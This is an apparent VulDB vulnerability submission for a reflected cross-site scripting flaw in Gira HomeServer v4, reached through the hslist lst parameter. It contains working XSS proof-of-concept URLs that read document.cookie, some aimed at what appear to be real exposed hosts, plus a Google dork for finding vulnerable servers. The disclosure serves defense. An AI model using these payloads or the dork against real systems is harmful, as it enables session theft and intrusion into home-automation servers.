| 제목 | Gira HomeServer v4 Reflected Cross-Site Scripting |
|---|
| 설명 | PoC:
Is it possible to escape with quotes via the hslist?lst=debug parameter, causing reflected cross-site scripting
https://x.x.x.x/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.12.0.220829 beta)
https://6cfa3ae45b506ee1966df14328c60679.rnas-dyn.bluewin.ch/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.11.3.220701)
http://jrola.xyz/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E (Version 4.11.1.210701)
Google Dork:
intext:"Gira HomeServer 4."
Product:
https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
|---|
| 원천 | ⚠️ https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
|---|
| 사용자 | Stux (UID 40142) |
|---|
| 제출 | 2023. 05. 06. PM 05:53 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 05. 16. PM 04:37 (10 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 229150 [Gira HomeServer 까지 4.12.0.220829 beta /hslist lst 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|